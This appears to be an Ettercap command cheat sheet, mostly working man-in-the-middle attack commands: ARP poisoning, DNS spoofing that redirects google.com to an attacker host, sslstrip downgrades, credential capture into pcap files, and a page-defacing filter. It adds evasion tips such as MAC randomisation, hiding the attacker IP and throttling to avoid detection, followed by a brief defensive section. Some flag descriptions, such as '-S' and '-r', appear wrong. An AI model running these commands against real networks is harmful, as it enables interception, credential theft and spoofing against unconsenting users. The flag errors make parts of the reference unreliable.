sudo apt-get update
sudo apt-get install ettercap-graphical ettercap-common
# Or CLI-only version
sudo apt-get install ettercap-text-only
sudo dnf install ettercap
brew install ettercap
git clone https://github.com/Ettercap/ettercap.git
cd ettercap
cmake .
make
sudo make install
sudo ettercap -G
# Recommended for interactive MITM attacks and real-time monitoring
# Provides visual interface for target selection and packet inspection
sudo ettercap -T
# Full-featured interactive mode without graphical dependencies
# Better for remote/headless systems
sudo ettercap -q
# Minimal output, useful for scripted deployments
ettercap -i eth0 -P list
# List available plugins without launching attacks
sudo ettercap -i list
# Display all network interfaces with details
sudo ettercap -i eth0
# Target specific interface (eth0, wlan0, etc.)
sudo ettercap -i eth0 -p
# Enable promiscuous mode for network sniffing
sudo ettercap -i eth0 -T -n
# N = scan for hosts, then exit
# Use before selecting targets
# Command line: -t <IP>/CIDR
sudo ettercap -i eth0 -T -t 192.168.1.5
# Target single IP address
# Syntax: IP1,IP2,IP3 or IP/mask
sudo ettercap -i eth0 -T -t 192.168.1.0/24
# Target entire subnet
sudo ettercap -i eth0 -T -t 192.168.1.5 -e "192.168.1.1,192.168.1.10"
# Attack range but exclude specific IPs
sudo ettercap -i eth0 -T -M arp:unified /192.168.1.100/ /192.168.1.1/
# Attacker -> Target -> Gateway
# Intercept traffic from single host through gateway
# Syntax: /victim_IP/ /gateway_IP/
sudo ettercap -i eth0 -T -M arp:bridged /192.168.1.100/ /192.168.1.200/
# Intercept traffic between two hosts
# Useful for peer-to-peer communication interception
sudo ettercap -i eth0 -T -M arp:remote /192.168.1.5/ /10.0.0.5/
# Intercept traffic between hosts on different subnets
# GUI: Mitm → ARP poisoning → Sniff remote connections
# Automatically rejects ARP requests to maintain connection
# Edit etter.dns file (typically /etc/ettercap/etter.dns)
# Format: pattern A|PTR|AAAA spoofed_IP
# Redirect all google.com requests to attacker
google.com A 192.168.1.10
www.google.com A 192.168.1.10
*.google.com A 192.168.1.10
# IPv6 spoofing
example.com AAAA ::ffff:c0a8:010a
# Reverse DNS (PTR)
1.1.1.1 PTR attacker.local
sudo ettercap -i eth0 -T -M arp:unified -P dns_spoof /192.168.1.5/ /192.168.1.1/
# Requires -P dns_spoof plugin and configured etter.dns
sudo ettercap -i eth0 -T -P dns_spoof -c /path/to/custom.dns
# Specify non-default DNS spoof configuration
sudo ettercap -i eth0 -T -P sslstrip /192.168.1.5/ /192.168.1.1/
# Downgrades HTTPS to HTTP during interception
# Requires ARP poisoning to work
sudo ettercap -i eth0 -T -M arp:unified -P sslstrip /192.168.1.5/ /192.168.1.1/
# Full MITM with SSL downgrade
# Intercept content after SSL stripping
# Modify HTTP responses during downgrade
sudo ettercap -i eth0 -T -L all.pcap
# Log all captured traffic to pcap file
# -L flag enables logging mode
sudo ettercap -i eth0 -T -F "tcp.dst.port == 443"
# Apply filter: only capture HTTPS traffic
# Port-based filtering
tcp.dst.port == 80 # Destination port 80
tcp.src.port == 443 # Source port 443
# Protocol filtering
proto == TCP # TCP only
proto == UDP # UDP only
proto == ICMP # ICMP only
# IP filtering
ip.src == 192.168.1.5 # Source IP
ip.dst == 8.8.8.8 # Destination IP
ip.dst in 192.168.1.0/24 # CIDR range
# HTTP-specific
http.request == 1 # HTTP requests only
http.uri contains "login" # URI pattern matching
sudo ettercap -i eth0 -T -L captured.pcap -F "tcp.dst.port == 80"
# Capture and filter simultaneously
# File: myfilter.ef
# Format: simple scripting language for packet manipulation
if (ip.proto == TCP && tcp.dst.port == 80) {
if (search(DATA.data, "User-Agent")) {
replace("User-Agent: Mozilla", "User-Agent: Ettercap");
msg("Modified User-Agent header");
}
}
if (ip.proto == TCP && tcp.dst.port == 443) {
kill();
}
etterfilter -o myfilter.filter myfilter.ef
# Converts .ef (human-readable) to .filter (bytecode)
sudo ettercap -i eth0 -T -F myfilter.filter
# Uses compiled filter during packet processing
# Data inspection
search(DATA.data, "string") # Search in packet data
regex(DATA.data, "pattern") # Regex matching
# Packet modification
replace("old", "new") # Replace string
inject("content") # Inject new content
# Flow control
kill() # Drop packet
drop() # Drop packet
accept() # Allow packet
sudo ettercap -P list
# Display all installed plugins with descriptions
sudo ettercap -i eth0 -T -P plugin_name
# Load and execute named plugin
sudo ettercap -i eth0 -T -P plugin1 -P plugin2 -P plugin3
# Load multiple plugins simultaneously
| Plugin | Purpose |
|---|
dns_spoof | DNS spoofing attacks |
sslstrip | HTTPS downgrade |
autoadd | Auto-add targets from traffic |
arp_cop | Detect ARP spoofing |
chk_poison | Verify ARP poisoning success |
find_ettercap | Detect other Ettercap instances |
ettercap_etter | Compatibility plugin |
finger | Passive OS fingerprinting |
sudo ettercap -P plugin_name -h
# Display plugin-specific help and options
sudo ettercap -i eth0 -T -M arp:unified \
-F "tcp.dst.port == 80" \
-L credentials.pcap \
/192.168.1.100/ /192.168.1.1/
# Capture HTTP traffic from target
# Analyze pcap for unencrypted credentials
# Create filter to replace content
etterfilter -o deface.filter deface.ef
sudo ettercap -i eth0 -T -M arp:unified \
-F deface.filter \
/192.168.1.100/ /192.168.1.1/
sudo ettercap -i eth0 -T \
-M arp:unified \
-P dns_spoof \
/192.168.1.100/ /192.168.1.1/
# Redirect target's DNS requests to attacker IP
# Enable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=1
# Redirect traffic to local proxy
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 \
-j REDIRECT --to-port 8080
# Run Ettercap with ARP poisoning
sudo ettercap -i eth0 -T -M arp:unified /192.168.1.100/ /192.168.1.1/
sudo ettercap -i eth0 -T \
-M arp:unified \
-P sslstrip \
/192.168.1.100/ /192.168.1.1/
# Requires ARP poisoning to intercept traffic
sudo macchanger -r eth0
# Randomize MAC address before attacking
# Harder to trace to physical hardware
# Avoid broadcasting identity during ARP poisoning
# Edit etter.conf: set send_arp in appropriate mode
# Stop Ettercap (Ctrl+C)
# Send gratuitous ARP to restore normal traffic
# Re-poison gateway with correct MAC if needed
# Manually send correction ARP
# Ensures victims resume normal connectivity
# Route Ettercap traffic through VPN
# Masks attacker IP from upstream logging
# Disable verbose logging in GUI
# Use quiet mode (-q) for minimal indicators
# Avoid generating ICMP/DNS queries from attacker IP
# Time attacks during high network activity
# Monitor for multiple MACs advertising same IP
# Excessive ARP traffic on quiet network
# Inconsistent MAC→IP mappings
# Tools: arp-scan, ettercap -P arp_cop
# Use static ARP entries for critical servers
arp -s 192.168.1.1 aa:bb:cc:dd:ee:ff
# Enable ARP filtering on Linux
echo 1 > /proc/sys/net/ipv4/conf/all/arp_ignore
echo 1 > /proc/sys/net/ipv4/conf/all/arp_announce
# Use ARP monitoring tools: XArp, Arpwatch
# Monitor for unexpected HTTP on ports normally HTTPS
# Check for missing HSTS headers
# Browser warnings about invalid certificates
# Isolate critical systems on separate VLANs
# Restrict ARP traffic between subnets
# Implement 802.1X port security
# Use VPN for all sensitive traffic
# Enforce HTTPS with HSTS headers
# Use certificate pinning in applications
sudo ettercap -i eth0 -T -r 100
# Limit packet rate to 100 packets/second
# Reduces network load and detection risk
sudo ettercap -i eth0 -T -S
# Drop to interactive shell during sniffing
# View captured pcap files
tcpdump -r captured.pcap
wireshark captured.pcap
# Parse specific protocol
strings captured.pcap | grep "password"
# Edit /etc/ettercap/etter.conf
# Configure global behavior:
# - ARP poisoning mode
# - Packet timing
# - Plugin paths
# - Logging options
sudo ettercap -i eth0 -T -w /custom/path/etter.conf
sudo ettercap -i eth0 -T -6
# Enable IPv6 MITM attacks (experimental)
# Verify IP forwarding enabled
cat /proc/sys/net/ipv4/ip_forward
# Enable if needed
sudo sysctl -w net.ipv4.ip_forward=1
# Check gateway reachability
ping 192.168.1.1
# Verify interface selection
sudo ettercap -i list
# Validate filter syntax
etterfilter -o output.filter input.ef -d
# Check for syntax errors in .ef file
# Review etterfilter man page for grammar
# Verify etter.dns format (spaces, not tabs)
# Ensure pattern matches target's DNS queries
# Check DNS plugin loaded: sudo ettercap -P list
# Test with nslookup from victim machine
nslookup example.com
# Reduce filter complexity
# Enable quiet mode (-q)
# Limit packet capture scope with -F flags
# Use bridged mode instead of unified for better performance
